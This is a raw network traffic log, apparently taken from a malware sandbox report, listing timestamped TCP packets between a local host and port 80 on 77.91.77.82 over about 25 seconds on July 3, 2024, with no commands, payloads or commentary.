Jul 3, 2024 18:09:30.654037952 CEST	62946	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:30.654361963 CEST	62947	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:30.659178972 CEST	80	62947	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:30.659276962 CEST	62947	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:30.659423113 CEST	62947	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:30.660531998 CEST	80	62946	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:30.660592079 CEST	62946	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:30.664237022 CEST	80	62947	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:31.350742102 CEST	80	62947	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:31.350806952 CEST	62947	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:31.351476908 CEST	62947	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:31.356548071 CEST	80	62947	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:31.573431969 CEST	80	62947	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:31.573702097 CEST	62947	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:31.687624931 CEST	62947	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:31.687932968 CEST	62948	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:31.693240881 CEST	80	62948	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:31.693633080 CEST	80	62947	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:31.693748951 CEST	62947	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:31.694041967 CEST	62948	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:31.694041967 CEST	62948	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:31.699227095 CEST	80	62948	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:32.384043932 CEST	80	62948	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:32.384150982 CEST	62948	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:32.384742975 CEST	62948	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:32.389585972 CEST	80	62948	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:32.598854065 CEST	80	62948	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:32.598920107 CEST	62948	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:32.714651108 CEST	62948	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:32.714953899 CEST	62949	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:32.720144987 CEST	80	62948	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:32.720181942 CEST	80	62949	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:32.720212936 CEST	62948	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:32.720279932 CEST	62949	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:32.720395088 CEST	62949	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:32.725207090 CEST	80	62949	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:33.420182943 CEST	80	62949	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:33.420306921 CEST	62949	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:33.420981884 CEST	62949	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:33.426649094 CEST	80	62949	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:33.646411896 CEST	80	62949	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:33.646717072 CEST	62949	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:33.765402079 CEST	62949	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:33.765908003 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:33.770428896 CEST	80	62949	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:33.770562887 CEST	62949	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:33.770611048 CEST	80	62950	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:33.770704985 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:33.773287058 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:33.778171062 CEST	80	62950	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:35.169857979 CEST	80	62950	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:35.170017004 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.170613050 CEST	80	62950	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:35.170665979 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.170831919 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.173105001 CEST	80	62950	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:35.173206091 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.176321030 CEST	80	62950	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:35.397423029 CEST	80	62950	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:35.397578001 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.511373997 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.511619091 CEST	62951	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.516431093 CEST	80	62951	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:35.516479015 CEST	80	62950	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:35.516506910 CEST	62951	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.516571999 CEST	62950	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.516750097 CEST	62951	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:35.521544933 CEST	80	62951	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:36.207905054 CEST	80	62951	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:36.208121061 CEST	62951	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:36.208854914 CEST	62951	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:36.213701010 CEST	80	62951	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:36.422951937 CEST	80	62951	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:36.423093081 CEST	62951	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:36.527466059 CEST	62951	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:36.527839899 CEST	62952	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:36.532716990 CEST	80	62951	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:36.533132076 CEST	80	62952	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:36.533230066 CEST	62951	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:36.533266068 CEST	62952	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:36.533454895 CEST	62952	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:36.538434982 CEST	80	62952	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:37.238859892 CEST	80	62952	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:37.238922119 CEST	62952	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:37.239566088 CEST	62952	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:37.244333982 CEST	80	62952	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:37.458806992 CEST	80	62952	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:37.458930016 CEST	62952	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:37.574116945 CEST	62952	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:37.574490070 CEST	62953	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:37.579590082 CEST	80	62952	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:37.579660892 CEST	62952	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:37.582495928 CEST	80	62953	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:37.582564116 CEST	62953	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:37.582690954 CEST	62953	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:37.587502003 CEST	80	62953	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:38.279793978 CEST	80	62953	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:38.279891014 CEST	62953	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:38.280626059 CEST	62953	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:38.285365105 CEST	80	62953	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:38.502810955 CEST	80	62953	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:38.502908945 CEST	62953	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:38.605400085 CEST	62953	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:38.605742931 CEST	62954	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:38.610503912 CEST	80	62954	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:38.610598087 CEST	62954	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:38.610714912 CEST	80	62953	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:38.610765934 CEST	62953	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:38.610898972 CEST	62954	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:38.615588903 CEST	80	62954	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:39.299514055 CEST	80	62954	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:39.299623966 CEST	62954	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:39.302880049 CEST	62954	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:39.307704926 CEST	80	62954	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:39.521378040 CEST	80	62954	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:39.521481991 CEST	62954	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:39.636781931 CEST	62954	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:39.637093067 CEST	62955	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:39.641910076 CEST	80	62955	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:39.641932011 CEST	80	62954	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:39.641974926 CEST	62955	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:39.641999960 CEST	62954	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:39.642170906 CEST	62955	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:39.646888971 CEST	80	62955	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:40.352895975 CEST	80	62955	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:40.353142977 CEST	62955	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:40.354044914 CEST	62955	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:40.358932018 CEST	80	62955	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:40.657865047 CEST	80	62955	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:40.657970905 CEST	62955	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:40.761821032 CEST	62955	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:40.762206078 CEST	62956	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:40.767076969 CEST	80	62956	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:40.767183065 CEST	62956	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:40.767302990 CEST	62956	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:40.767498970 CEST	80	62955	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:40.767544985 CEST	62955	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:40.772104979 CEST	80	62956	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:41.462383986 CEST	80	62956	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:41.462491989 CEST	62956	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:41.463291883 CEST	62956	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:41.468087912 CEST	80	62956	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:41.698949099 CEST	80	62956	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:41.699043036 CEST	62956	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:41.808370113 CEST	62956	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:41.808703899 CEST	62957	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:41.813530922 CEST	80	62957	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:41.813637018 CEST	62957	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:41.813736916 CEST	62957	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:41.813801050 CEST	80	62956	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:41.813847065 CEST	62956	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:41.818499088 CEST	80	62957	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:42.552440882 CEST	80	62957	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:42.552738905 CEST	62957	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:42.553288937 CEST	62957	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:42.558157921 CEST	80	62957	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:42.775460958 CEST	80	62957	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:42.775585890 CEST	62957	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:42.886600018 CEST	62957	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:42.886934042 CEST	62958	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:42.891693115 CEST	80	62958	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:42.891786098 CEST	62958	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:42.891889095 CEST	80	62957	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:42.891916037 CEST	62958	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:42.891936064 CEST	62957	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:42.896992922 CEST	80	62958	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:43.580265045 CEST	80	62958	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:43.580415010 CEST	62958	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:43.581374884 CEST	62958	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:43.586524010 CEST	80	62958	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:43.800369024 CEST	80	62958	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:43.800434113 CEST	62958	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:43.902203083 CEST	62958	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:43.902643919 CEST	62959	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:43.907381058 CEST	80	62958	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:43.907495022 CEST	62958	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:43.907514095 CEST	80	62959	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:43.907589912 CEST	62959	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:43.907795906 CEST	62959	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:43.912552118 CEST	80	62959	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:44.607295990 CEST	80	62959	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:44.607418060 CEST	62959	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:44.608083010 CEST	62959	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:44.613945007 CEST	80	62959	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:44.827547073 CEST	80	62959	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:44.827651024 CEST	62959	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:44.933306932 CEST	62959	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:44.933785915 CEST	62960	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:44.938571930 CEST	80	62960	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:44.938652992 CEST	62960	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:44.938781023 CEST	62960	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:44.939273119 CEST	80	62959	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:44.939316988 CEST	62959	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:44.944602013 CEST	80	62960	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:45.619043112 CEST	80	62960	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:45.619163990 CEST	62960	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:45.619884968 CEST	62960	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:45.625704050 CEST	80	62960	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:45.835448027 CEST	80	62960	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:45.835678101 CEST	62960	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:45.949101925 CEST	62960	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:45.949440002 CEST	62961	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:45.954495907 CEST	80	62960	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:45.954575062 CEST	62960	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:45.955168009 CEST	80	62961	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:45.955235958 CEST	62961	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:45.955426931 CEST	62961	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:45.960427999 CEST	80	62961	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:46.641026974 CEST	80	62961	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:46.641134024 CEST	62961	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:46.643790960 CEST	62961	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:46.648956060 CEST	80	62961	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:46.864156008 CEST	80	62961	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:46.864279985 CEST	62961	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:46.980243921 CEST	62961	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:46.980577946 CEST	62962	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:46.985574961 CEST	80	62962	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:46.985677004 CEST	80	62961	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:46.985852957 CEST	62962	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:46.985853910 CEST	62961	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:46.985938072 CEST	62962	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:46.990976095 CEST	80	62962	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:47.702289104 CEST	80	62962	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:47.702423096 CEST	62962	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:47.703069925 CEST	62962	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:47.707813978 CEST	80	62962	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:47.927119970 CEST	80	62962	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:47.927177906 CEST	62962	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:48.042803049 CEST	62962	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:48.043157101 CEST	62963	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:48.047998905 CEST	80	62963	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:48.048130989 CEST	62963	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:48.048160076 CEST	80	62962	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:48.048217058 CEST	62963	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:48.048218966 CEST	62962	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:48.052997112 CEST	80	62963	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:48.733721018 CEST	80	62963	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:48.733778954 CEST	62963	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:48.734534979 CEST	62963	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:48.739259005 CEST	80	62963	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:48.968265057 CEST	80	62963	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:48.968518972 CEST	62963	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:49.073931932 CEST	62963	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:49.074291945 CEST	62964	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:49.079545975 CEST	80	62963	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:49.079555988 CEST	80	62964	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:49.079648018 CEST	62963	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:49.079664946 CEST	62964	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:49.079917908 CEST	62964	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:49.084683895 CEST	80	62964	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:49.853691101 CEST	80	62964	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:49.853828907 CEST	62964	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:49.854569912 CEST	62964	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:49.859540939 CEST	80	62964	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:50.070518970 CEST	80	62964	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:50.070631027 CEST	62964	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:50.183551073 CEST	62964	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:50.183840990 CEST	62965	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:50.188592911 CEST	80	62964	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:50.188647985 CEST	80	62965	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:50.188649893 CEST	62964	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:50.188711882 CEST	62965	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:50.188919067 CEST	62965	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:50.194432020 CEST	80	62965	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:50.883858919 CEST	80	62965	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:50.883928061 CEST	62965	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:50.884701967 CEST	62965	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:50.889646053 CEST	80	62965	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:51.105940104 CEST	80	62965	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:51.106014013 CEST	62965	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:51.215107918 CEST	62965	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:51.215413094 CEST	62966	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:51.220622063 CEST	80	62966	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:51.220743895 CEST	62966	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:51.220863104 CEST	80	62965	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:51.220870018 CEST	62966	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:51.220907927 CEST	62965	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:51.225730896 CEST	80	62966	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:51.934384108 CEST	80	62966	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:51.934523106 CEST	62966	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:51.935308933 CEST	62966	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:51.940063953 CEST	80	62966	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:52.155081987 CEST	80	62966	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:52.155205011 CEST	62966	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:52.263468981 CEST	62966	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:52.263777971 CEST	62967	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:52.268572092 CEST	80	62966	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:52.268587112 CEST	80	62967	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:52.268784046 CEST	62966	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:52.268827915 CEST	62967	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:52.269040108 CEST	62967	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:52.273749113 CEST	80	62967	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:52.948048115 CEST	80	62967	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:52.948199987 CEST	62967	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:52.949114084 CEST	62967	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:52.953922033 CEST	80	62967	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:53.167275906 CEST	80	62967	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:53.167428017 CEST	62967	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:53.277142048 CEST	62967	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:53.277471066 CEST	62968	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:53.282345057 CEST	80	62967	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:53.282423973 CEST	62967	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:53.282602072 CEST	80	62968	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:53.282672882 CEST	62968	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:53.282814026 CEST	62968	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:53.288268089 CEST	80	62968	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:53.962038040 CEST	80	62968	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:53.962158918 CEST	62968	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:53.962857962 CEST	62968	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:53.968971014 CEST	80	62968	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:54.178462029 CEST	80	62968	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:54.178558111 CEST	62968	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:54.292735100 CEST	62968	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:54.293090105 CEST	62969	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:54.297895908 CEST	80	62968	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:54.297980070 CEST	62968	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:54.298329115 CEST	80	62969	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:54.298393965 CEST	62969	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:54.298521996 CEST	62969	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:54.303318024 CEST	80	62969	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:55.006325006 CEST	80	62969	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:55.006424904 CEST	62969	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:55.007253885 CEST	62969	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:55.013693094 CEST	80	62969	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:55.229883909 CEST	80	62969	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:55.230006933 CEST	62969	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:55.339719057 CEST	62969	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:55.340074062 CEST	62970	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:55.344738960 CEST	80	62969	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:55.344795942 CEST	80	62970	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:55.344899893 CEST	62969	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:55.344919920 CEST	62970	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:55.345161915 CEST	62970	80	192.168.2.6	77.91.77.82
